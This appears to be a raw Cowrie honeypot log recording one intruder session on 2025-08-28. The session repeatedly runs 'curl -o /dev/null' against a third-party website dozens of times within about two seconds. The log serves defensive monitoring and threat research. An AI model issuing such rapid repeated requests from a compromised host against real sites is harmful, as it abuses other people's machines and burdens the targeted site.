{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:56.076088Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:56.123939Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:56.124960Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:56.161533Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:56.162840Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:56.205997Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:56.207346Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:56.244269Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:56.245323Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:56.286602Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:56.287463Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:56.325018Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:56.326163Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:56.363374Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:56.364403Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:56.401998Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:56.403161Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:56.441364Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:56.442548Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:56.479474Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:56.480682Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:56.529997Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:56.531258Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:56.568268Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:56.569260Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:56.606355Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:56.607553Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:56.644932Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:56.646198Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:56.683075Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:56.684201Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:56.720404Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:56.721808Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:56.759137Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:56.760249Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:56.800200Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:56.801301Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:56.838794Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:56.840484Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:56.877638Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:56.878945Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:56.926390Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:56.927531Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:56.964461Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:56.966116Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:57.004410Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:57.005423Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:57.043980Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:57.045346Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:57.082888Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:57.084320Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:57.122476Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:57.123622Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:57.161003Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:57.162066Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:57.200214Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:57.201761Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:57.238957Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:57.239955Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:57.276483Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:57.277685Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:57.326429Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:57.327506Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:57.364721Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:57.365834Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:57.403367Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:57.404446Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:57.443811Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:57.444900Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:57.486800Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:57.487891Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:57.525205Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:57.526476Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:57.564181Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:57.565199Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:57.602130Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:57.603218Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:57.640002Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:57.641326Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:57.680437Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:57.681449Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:57.728797Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:57.729845Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:57.768122Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:57.769349Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:57.807842Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:57.808880Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:57.851946Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:57.852943Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:57.897930Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:57.898942Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:57.944379Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:57.945413Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:57.983104Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:57.984082Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:58.032315Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:58.033311Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:58.081758Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:58.082855Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:58.120567Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:58.121998Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:58.173090Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:58.174083Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:58.213595Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:58.214583Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:58.251202Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:58.252380Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:58.289631Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:58.290620Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:58.327430Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:58.328398Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:58.364773Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:58.366489Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:58.403120Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:58.404090Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:58.440859Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:58.442051Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:58.481717Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:58.483066Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:58.521103Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:58.522172Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:58.568873Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:58.570101Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:58.611376Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:58.612592Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:58.649590Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:58.650743Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:58.688301Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:58.689563Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:58.727050Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
